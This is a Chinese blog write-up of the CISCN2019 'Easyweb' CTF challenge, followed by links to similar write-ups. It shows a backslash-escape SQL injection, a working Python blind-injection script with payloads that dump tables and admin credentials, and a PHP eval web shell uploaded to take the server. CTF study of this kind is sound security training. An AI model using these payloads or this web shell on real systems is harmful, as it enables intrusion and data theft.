[CISCN2019 总决赛 Day2 Web1]Easyweb

最新推荐文章于 2022-04-08 20:46:04 发布
最新推荐文章于 2022-04-08 20:46:04 发布
阅读量166 收藏
点赞数
分类专栏: CTF WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K1ose/article/details/114652329
版权

访问页面;
看到login页面不能心急,先进行一波信息收集,看看有没有其他文件;
在view-source中看到user.php;
user.php
再看看robots.txt等等;
也可以用wctf-scan扫一下;
可以看到有备份文件;
备份文件
扫描一下,得到image.php.bak文件;
以下为源码:

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

addslashes()在每个双引号前会添加一个转义符号;
还会将数组里的符号(\0、%00、’、’)都替换成空;
最后执行sql语句;
首先,为了绕过addslashes(),不能用双引号;
其次,在str_replace()函数操作下,可以利用替换来闭合id的第一个单引号;
id=\\0
id=\\0经过函数处理后面的\0被替换成了空,变成了id=\
这样在执行sql语句时,sql语句变成了:

select * from images where id='【\' or path=】'    {$path}'

此时id=\' or path=
因此,现在需要输入path来注释剩下的一个单引号,并且利用path来进行注入;
path=or if(length(database())>5,1,0)#
这样,代入完整语句为:

select * from images where id='【\' or path=】' or 1=if(length(database())>5,1,0)#

因此payload为:

id=\\0&path= or 1=if(length(database())>5,1,0) --+

这个payload测试一下是否为bool盲注;
结果是符合预期的;
在true情况下,会显示图片,在false情况下,会显示如下信息;
false下回显
这样我们就可以动手写脚本了;

import requests
import time

url = 'http://18c8df53-6d02-48f3-a287-05d6d36dbf7e.node3.buuoj.cn/image.php?id=\\0&path=or%20'
flag = ''

for i in range(1, 100):
    low = 32
    high = 128
    mid = (low + high) >> 1
    while low < high:
        payload = '1^(ascii(substr(database(),%d,1))>%d)--+' % (i, mid)
        res = requests.get(url + payload)

        if "JFIF" in res.text:			#JFIF代表图片,如果图片显示成功则返回为true
            high = mid
        else:
            low = mid + 1
        mid = (low + high) >> 1
        time.sleep(1)
    if (mid==32 or high==127):
        break
    flag = flag + chr(mid)
    print(flag)

跑出来是
ciscnfinal
接下来老样子,跑表;

payload = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)--+" % (i, mid)

不得不说Pycharm 社区版真的慢得不行!
最后跑出来
images,users
images就不看了,直接看users;

payload = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),%d,1))>%d)--+" % (i, mid)

发现爆不出来,换成十六进制再试试;

payload = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema=0x636973636e66696e616c)and(table_name=0x7573657273)),%d,1))>%d)--+" % (i, mid)

爆出了
username,password
看看内容;

payload = "1^(ascii(substr((select group_concat(username,0x2b,password)from users),%d,1))>%d)--+" % (i, mid)

得到
admin+1a5f1401f1660d2b3318
登录成功;
文件上传
接着是一个文件上传;
上🐎;

<?php @eval($_POST['k1ose']);?>

上传显示连接被重置了…我也不知道是什么情况;
看网上这个情况会被过滤;
换个🐎;

<?=@eval($_POST['k1ose'];?>

蚁剑链接就拿到flag了;

K1ose
关注
专栏目录
CISCN2019 华北赛区 Day2 Web1
kid的博客
09-09 1749
CISCN2019 华北赛区 Day2 Web1 前言 最近太懒一直没有怎么学习,今天把《轮到你了》结局看了也极为失望,作为黑岛的舔狗我决定好好刷题提高自己,不然都没有实力去当舔???? (当好舔????真不容易) 打开大佬的博客发现好多新的题和环境…好吧,一道一道来吧 感谢大佬提供的环境:https://github.com/glzjin/CISCN_2019_northern_China_day2_we...
buuctf-[CISCN2019 总决赛 Day2 Web1]Easyweb
m0_62094846的博客
05-18 763
扫描目录 得到*.php.bak 尝试*表示的东西, index,flag之类的都没用 有image.php,顺便可以看到可能的注入点 下载下了备份文件 <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=addslashes($path); ...
CISCN2019 总决赛 Day2 Web1】-Easy web
xixihahawuwu的博客
11-28 812
进入环境是一个登录界面检查页面元素没有发现啥,我们把源码下载下来看看先看config文件 是一个数据库文件 数据库名为ciscnfinal 接着看function文件 我们可以看到有关登录界面的还有两个函数方法 看image文件Get传递两个参数 把一些字符替换成空Addslashes()函数会把一些特殊的字符转义,比如单引号转为\’,\转为\其他的看了下,没有什么信息就过掉了 我们看下upload文件要求我们用户名必须为admin 这里我们可以获得用户名admin在user文件中我们可以知道成功登陆后的.
[ciscn2019 总决赛 day2 web1]easyweb
最新发布
03-16
ciscn2019 总决赛 day2 web1 easyweb 是一道Web安全题目,需要使用SQL注入技术来解决。 首先,我们需要在登录页面中输入用户名和密码。然后,我们可以通过在用户名和密码字段中输入一些SQL注入语句来尝试绕过验证...
buu-[CISCN2019 总决赛 Day2 Web1]Easyweb
qaq517384的博客
10-10 271
扫!(或者靠经验先试) /robots.txt 看源码发现已知的php只有user.php/image.php/index.php 然后在image.php.bak里找到源码 <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=addslashes($path); $i
CTF训练计划—[CISCN2019]Easyweb
Lemon's blog
08-14 1387
前言: 这道题学到不少知识,还卡了很长时间,单独记录一下 [CISCN2019]Easyweb 首先拿到一个登陆框,从这里就要思考是要怎么去做,我在做的时候想到三个方面去尝试 burp抓包看有什么线索没 SQL万能密码注入 页面扫描,看看有什么源码泄露或者robots.txt 前两个都行不通,刚开始页面扫描的时候也没有扫到什么,然后就彻底懵了,后来发现是工具犯病了,再扫一次就出来了 一个robots.txt文件,访问可以发现提示的是备份文件,但没说具体的文件名 就利用排除法,一个一个的去试试,目前知
[安洵杯 2019]easy_web 1
plant1234的博客
04-08 1738
首先打开题目得到: 发现url有所不同: img为base64加密,解码后发现还是base64,继续解码,然后是16进制 在解码得到: 发现img可能存在文件包含漏洞: 将index.php按照加密方法加密请求得到: 发现base64编码解码,得到 发现是index.php源码 <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;charset=utf-8'); $cmd = $_GET['cm
[CISCN2019 总决赛 Day2 Web1]Easyweb1
Mrs_H的博客
10-22 555
一.前言 在之前的文章中我提到最近一直在做sql注入相关的东西,也在一直做sql注入有关的题目。但是,事实上很多赛题他们的考点并不单一,往往需要结合着其他的知识,才能够拿到想要的结果。下面这道题就是我刚才所说的典型,虽然考的不难,但是足够说明当前sql题目的走向了。 二.正文 我们首先打开环境看到如下页面。 emmm,一个花里胡哨的登陆界面。尝试输入了很多用户名和密码组合,但是都不对。那就去扫一下目录,发现该网站存在一个robots.txt 这个robots文件中的内容就是在提示我们,该网站含有备份文件
[CISCN2019 总决赛 Day2 Web1]Easyweb 1
weixin_43940853的博客
03-17 1392
文件泄露 通过观察源代码(反正就是这几个php文件嘛,一个个试就行了) //image.php.bak <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=a...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值